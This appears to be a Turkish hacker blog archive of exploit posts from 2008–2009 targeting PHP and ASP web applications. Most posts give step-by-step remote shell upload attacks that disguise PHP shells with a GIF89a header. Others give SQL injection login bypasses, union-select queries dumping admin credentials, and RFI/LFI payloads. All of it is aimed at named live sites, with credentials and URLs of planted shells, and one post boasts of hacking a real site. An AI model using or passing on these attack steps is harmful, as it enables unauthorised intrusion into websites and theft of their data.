"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

Remote File Upload etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
Remote File Upload etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

2 Haziran 2009 Salı

AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability

kaynak: http://www.milw0rm.com/exploits/8855

kaynak: http://www.yildirimordulari.com/showthread.php?t=7689



add this code you shell head:

exapmle:

GIF89a;

...
...
...

?>

save you shell.php

after go here:

yildirimordulari.com/article/register.php

after select your shell.php

done register after login to site edit your profile

and you look your shell name

yildirimordulari.com/article/images/author_pics/[id].php

example demo:

http://www.blizsoft.com/article/register.php

user: salla

pass: 123a123

shell:

http://www.blizsoft.com/article/images/author_pics/41.php

17 Ocak 2009 Cumartesi

Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability

Aj Classifieds - For Sale v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7811



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Merchandise/uploadimages/20090116084627c.php

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

Aj Classifieds - Personals v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7810



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Personal/uploadimages/20090116083033c.php

Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability

Aj Classifieds - Real Estate v3 Remote Shell Upload Vulnerability

link: http://www.milw0rm.com/exploits/7809



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

you go index.php?do=postad

add you post select your image for Main Image and Thumbnail Image

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp for demo:

user: demouser@ajsquare.com

pass: demouser

http://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/uploadimages/20090116070716c.php

6 Ocak 2009 Salı

RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability

RiotPix <= 0.61 (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7682



Discovered By: ZoRLu

for demo:

username: logoz ' or '

pass: dont write anything

http://www.riotpix.com/board/

3 Ocak 2009 Cumartesi

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7645



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://demos.built2go.com/rate%20my%20photo/1/

login:

http://demos.built2go.com/rate%20my%20photo/1/member.php

user: salla

pass: salla1

shell:

http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php

Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability

Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7644



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://www.q-seek.com/

login:

http://www.q-seek.com/member.php

user: salla

pass: salla1

shell:

http://www.q-seek.com/pictures/14_2009-01-02-02-25-03.php

2 Ocak 2009 Cuma

hikayeler.net hacking video

hatırlıyorsanız bir kac gün önce hikayeler.net te acık bulup hacklediğimi söylemiştim. açık file upload açığı. kendilerinede özel mesajla açık olduğunu bildirmiştim. belli ki pekte umursamamışlar madem onlar umursamıyor ben hiç umursamam xD açık kapandımı bilmiyorum. daha sonra hiç kontrol etmedim.

işte video:

TIKLA iNDiR



parola:

z0rlu.blogspot.com

1 Ocak 2009 Perşembe

getaphpsite PHP Careers Search Remote File Upload

getaphpsite PHP Careers Search Remote File Upload

link: http://www.exploiter5.com/all.php?id=59

link: http://packetstormsecurity.org/0812-exploits/phpcareers-upload.txt

you go here : http://z0rlu.blogspot.com/script/employers/employer_registration.php

and register to site

after you click to gozat button and select your shell.php for register to site

after go here: http://z0rlu.blogspot.com/script/employers/employers/login.php

and login to site more after click to "Edit Info" ( you must look to left )

you must be here now: http://z0rlu.blogspot.com/script/employers/employers/EditInfo.php

and you right click to your logo select properties and copy logo link

go your shell:

http://z0rlu.blogspot.com/script/employers/employer_logos/[id]_offer_shell.php


exp for demo:

http://www.phpstore.info/demos/phpcareers/employers/login.php

user: zorlu

passwd: zorlu1

http://www.phpstore.info/demos/phpcareers/employers/EditInfo.php

and shell:

http://www.phpstore.info/demos/phpcareers/employers/employer_logos/1228994464_offer_c.php ( no permission for demo )

22 Aralık 2008 Pazartesi

E-Learning Portal Remote File Upload


E-Learning Portal Remote File Upload

link 1: http://www.exploiter5.com/all.php?id=47

link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt

Discovered By: ZoRLu

exp:

http://www.preprojects.com/elearning/uploaded/your_shell.asp

you register to site

login this site

after upload you_shell.asp

exp for demo:

register:

http://www.preprojects.com/elearning/new_student.asp

login:

role: select STUDENT

user: zorlu

passwd: zorlu1


shell

http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )

server daki siteler:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git


buda golden gate:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM

17 Aralık 2008 Çarşamba

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

link: http://www.milw0rm.com/exploits/7494

link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt

Discovered By: ZoRLu


exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

firs you register to site

login to site and edit your pictures select your shell.asp

go your shell asp:

http://joineazy.com/members/member_pictures/shell.asp

9 Aralık 2008 Salı

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7392

Discovered By: ZoRLu

file:

_conf/core/common-tpl-vars.php

c0de:

require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )

rfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?

lfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]

7 Eylül 2008 Pazar

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

Bu açık sayesinde scriptin kurulu olduğu siteye dosya upload yapabiliyoruz. Bu fırsatın art niyetli birinin eline geçtiğini bir düşünün. resim upload yerine bir shell upload edebilir dolayısıyla serverda yetki elde etmiş olur.

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

exploit:http://localhost/izabi/system/cache/pictures/id_shell.php-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. gözat button click and shell.php upload
-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php

# milw0rm.com [2008-02-17]
 
Dizi